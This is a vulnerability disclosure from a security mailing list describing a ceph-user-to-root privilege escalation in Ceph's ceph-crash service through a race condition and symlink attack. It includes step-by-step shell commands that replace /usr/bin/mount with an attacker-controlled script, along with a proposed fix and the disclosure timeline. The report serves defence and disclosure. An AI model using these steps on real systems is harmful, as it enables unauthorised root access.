Date: Tue, 25 Oct 2022 12:00:11 +0200
From: Matthias Gerstner <>
Subject: ceph: ceph-crash.service allows local ceph user to root exploit

Hello list,

this report is about a ceph user to root privilege escalation in the
ceph-crash systemd service which is part of the ceph-base component of
the Ceph distributed storage system project [1]. This report relates to
Ceph version 16.2.9.

The Vulnerability

The ceph-crash.service [2] runs the ceph-crash Python script [3] as
root. The script is operating in the directory /var/lib/ceph/crash which
is controlled by the unprivileged ceph user (ceph:ceph mode 0750). The
script periodically scans for new crash directories and forwards the
content via `ceph crash post`. This constellation is subject to security
issues that can allow the ceph user to either:

1) post arbitrary data as a "crash dump", even content from private
   files owned by root. The consequences of this are not fully clear to me,
   it could be an information leak if the security domain of "root" on the
   system is different to the security domain of wherever the ceph-crash
   data will be sent to / accessible afterwards. The `ceph crash post`
   command expects JSON input, however, thus the degree of freedom for
   this is reduced.

2) cause a denial-of-service by feeding large amounts of data into the
   `ceph crash post` process. This can cause high amounts of memory and CPU
   consumption. By placing a symlink or FIFO into the directory instead of
   an actual file, the script can be made to read from a device file
   like /dev/random or to block forever.

3) cause a local ceph to root user privilege escalation by tricking
   ceph-crash to move a ceph controlled file into a privileged file system

Item 3) is the most critical of these possibilities. The ceph-crash
script basically does the following at a regular interval (by default
every 10 minutes):

a) it iterates over all sub-directories of /var/lib/ceph/crash
   and for each sub-directory it does the following:
  b) it checks whether <crash>/meta is a regular file; if not then the
     dir is skipped.
  c) it checks whether <crash>/done is a regular file; if not then it
     sleeps for one second and checks again; if still not then the dir
     is skipped.
  d) it feeds the content of <crash>/meta to stdin of the command line
         timeout 30 ceph -n <auth> crash post -i -
  e) only if the crash post succeeded (exit code 0) will the script
     attempt to perform

The sleep of one second in step c) makes it easier winning the involved
race condition. A possible approach for a compromised ceph user account
for exploiting this is the following:

- create a fake crash directory named 'mount', containing an empty
  'meta' file:

  ceph$ mkdir /var/lib/ceph/crash/mount
  ceph$ touch /var/lib/ceph/crash/mount/meta

- wait for c) to happen i.e. ceph-crash sleeps for a second to wait for
  the "done" file to appear. This can be done in an event triggered
  fashion by using the inotify API to detect the service opening the
  crash directory. While ceph-crash is sleeping create the "done" file
  and replace "meta" by a FIFO:

  ceph$ touch /var/lib/ceph/crash/mount/done
  ceph$ rm /var/lib/ceph/crash/mount/meta
  ceph$ mkfifo /var/lib/ceph/crash/mount/meta

  On success the "ceph-crash" script, upon returning from the one second
  sleep, will block on the FIFO until the attacker is writing data into
  it, giving the attacker enough time to stage the rest of the attack
  (30 seconds, because of the `timeout` frontend command used in step

- while ceph-crash is busy forwarding data to `ceph crash post` the ceph
  user can replace the "mount" directory by a regular file and prepare a
  symlink attack:

  ceph$ mv /var/lib/ceph/crash/mount /var/lib/ceph/crash/oldmount
  ceph$ echo 'echo evil code' >/var/lib/ceph/crash/mount
  ceph$ chmod 755 /var/lib/ceph/crash/mount
  ceph$ mv /var/lib/ceph/crash/posted /var/lib/ceph/crash/posted.old
  ceph$ ln -s /usr/bin /var/lib/ceph/crash/posted
  # unblock the ceph-crash script
  ceph$ echo "$FAKE_JSON_DATA" >/var/lib/ceph/crash/oldmount/meta

If this succeeds in time then during step e) the ceph-crash script will
rename the ceph controlled "mount" file to /usr/bin/mount, thereby
replacing the system binary "mount" by the ceph controlled script. Any
root process invoking this is then executing exploit code. Any other
binary could be used for this, or also configuration files in /etc that
could allow to crack the system.

Because /var/lib/ceph/crash is not world-writable and has no sticky bit,
the Linux kernel's symlink protection is not coming to the rescue in
this constellation. A precondition is, however, that the file system
/var/lib/ceph is the same file system as the target directory for the
`rename()`, because `rename()` does not work across file system
boundaries. For many default Linux setups this is the case though.


Attached to this e-mail is a proof of concept exploit script that
demonstrates the vulnerability. Running the script with ceph:ceph
credentials pretty reliably replaces /usr/bin/mount by a ceph controlled
script. Since ceph-crash only executes its routine every 10 minutes it
can take a bit of time to succeed if the race is not won, but it is
well within reach to succeed in a real world scenario.

I did not test this in a real world Ceph setup. For testing purposes I
let the invocation of "ceph crash post" always succeed. From reading the
Python code executed by "ceph crash post" I believe that the JSON data I
use in the exploit script should be accepted and lead to a zero exit

Possible Fix

To fix the issue the simplest route I see would be to execute the
ceph-crash script also as ceph:ceph. If this is not possible for some
reason though then a careful selection of system calls and/or temporary
privilege drops will be necessary in the ceph-crash script to avoid any
symlink attacks and other race conditions on file system level.

The systemd service, the ceph-crash script and also the directory
permissions for /var/lib/ceph/crash are not specific to SUSE packaging
but are already found in the upstream sources. Also Fedora Linux ships
with the same setup, for example.

I reported this finding to the Ceph security mailing list a while ago.
Red Hat assigned the CVE for the issue. I did not get a confirmation
from their side yet whether the issue could be reproduced with a real
world Ceph setup. I also didn't hear about upstream's plans and schedule
for an actual bugfix.


2022-09-22: I reported the vulnerability to suggesting
            an embargo period of 14 days.
2022-10-10: I provided some additional information to
	    suggested two more weeks of embargo, because I wasn't
	    available for some time and things didn't progress much.
2022-10-21: I inquired about the state of their
	    analysis and bugfixing. I received the CVE for the issue.
	    They suffers some delays in handling the issue but we agreed
	    to publish the full report today anyway.


Best Regards


Matthias Gerstner <>
Security Engineer
GPG Key ID: 0x14C405C971923553
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

